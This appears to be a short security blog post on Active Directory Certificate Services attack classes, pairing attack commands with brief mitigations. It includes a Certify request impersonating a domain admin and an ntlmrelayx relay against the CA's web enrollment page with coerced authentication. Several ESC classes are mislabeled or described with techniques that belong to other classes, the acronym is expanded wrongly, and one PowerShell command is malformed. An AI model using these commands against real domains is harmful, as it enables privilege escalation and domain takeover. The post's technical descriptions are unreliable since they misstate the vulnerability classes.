Listen to this Post
Active Directory Certificate Services (ADCS) is a critical component in Windows environments, often targeted during penetration testing and red team engagements. This article explores common vulnerabilities and misconfigurations in ADCS, specifically focusing on ESC (Elevation of Service Control) vulnerabilities like ESC5, ESC7, ESC9, ESC10, ESC11, ESC13, ESC14, and ESC15.
You Should Know:
1. Understanding ADCS Vulnerabilities
ADCS provides PKI (Public Key Infrastructure) services in Windows domains. Misconfigurations can lead to privilege escalation, credential theft, and domain compromise. Below are key exploits and their mitigation steps.
2. Exploiting ESC5 (Misconfigured Certificate Templates)
ESC5 occurs when low-privileged users can enroll in certificate templates that allow domain escalation.
Commands to Check Vulnerable Templates:
Get-ADObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=local" -Filter -Properties | Select-Object Name, msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag, msPKI-Private-Key-Flag
Exploitation:
If a template allows `ENROLLEE_SUPPLIES_SUBJECT` and permits client authentication, an attacker can request a certificate for a high-privileged account.
3. Exploiting ESC7 (CA Server Misconfigurations)
ESC7 involves abusing CA server permissions, allowing unauthorized certificate issuance.
Check CA Permissions:
certutil -config "CA_SERVER\CA_NAME" -getreg "reg\PolicyModules"
Exploit via Certify:
Certify.exe request /ca:CA_SERVER\CA_NAME /template:VULNERABLE_TEMPLATE /altname:DOMAIN_ADMIN
- ESC9 & ESC10 (NTLM Relay to ADCS HTTP Endpoints)
ESC9/10 allows NTLM relay attacks against ADCS HTTP endpoints.
Exploitation Steps:
1. Start an NTLM relay attack using ntlmrelayx:
ntlmrelayx.py -t http://CA_SERVER/certsrv/certfnsh.asp -smb2support --adcs --template ESC9_Template
2. Coerce authentication via PetitPotam or PrinterBug.
5. ESC11 (RPC Misconfigurations)
ESC11 abuses RPC interfaces to manipulate certificate requests.
Check Vulnerable Interfaces:
Get-CertificationAuthority | Select-Object ConfigString, Name
- ESC13, ESC14, & ESC15 (Certificate Chain Abuse)
These involve abusing certificate chain trust relationships.
Verify Certificate Chains:
openssl x509 -in cert.pem -text -noout
Mitigation Strategies
- Restrict enrollment rights on certificate templates.
- Disable NTLM authentication where possible.
- Monitor CA server logs for unusual requests.
- Apply Microsoft patches for known ADCS vulnerabilities.
What Undercode Say
ADCS is a goldmine for attackers if misconfigured. Regular audits, least-privilege principles, and monitoring are essential. Below are additional hardening commands:
Linux (for PKI Analysis):
openssl s_client -connect CA_SERVER:443 -showcerts
Windows (Audit CA Logs):
Get-WinEvent -LogName "Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational"
Expected Output:
A secure ADCS setup with no unauthorized enrollments and strict template permissions.
Reference:
References:
Reported By: Florian Hansemann – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
